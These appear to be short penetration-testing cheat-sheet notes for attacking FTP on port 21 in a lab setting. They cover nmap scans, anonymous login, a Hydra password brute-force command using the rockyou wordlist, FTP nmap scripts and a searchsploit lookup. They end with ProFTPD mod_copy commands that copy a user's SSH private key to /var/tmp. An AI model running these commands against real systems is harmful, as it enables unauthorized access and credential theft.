Port 21 - ftp

Nmap

nmap -p- -A $(target)
nmap -p 21 -A $(target)

Anonymous login

ftp $(target)
> anonymous
> anonymous

Bruteforce - Hydra

hydra -t 4 -l mike -P /usr/share/wordlists/rockyou.txt -vV 10.10.227.75 ftp

Nmap script for ftp

find /  -name *.nse 2>/dev/null | grep 'ftp' | tee nmap.script
> ftp-syst.nse
> tftp-enum.nse
> ftp-libopie.nse
> ftp-anon.nse
> ftp-vuln-cve2010-4221.nse
> ftp-proftpd-backdoor.nse
> ftp-bounce.nse
> ftp-brute.nse
> ftp-vsftpd-backdoor.nse

nmap -p 21 --script=ftp-anon.nse $(target)

ProFtpd

Searchsploit

searchsploit proftpd 1.3.5

FTP Copy & Past

SITE CPFR /home/{TARGT_USER}/.ssh/id_rsa
SITE CPTO /var/tmp/id_rsa

SITE CPFR /home/{TARGT_USER}/.ssh/id_rsa.pub
SITE CPTO /var/tmp/id_rsa.pub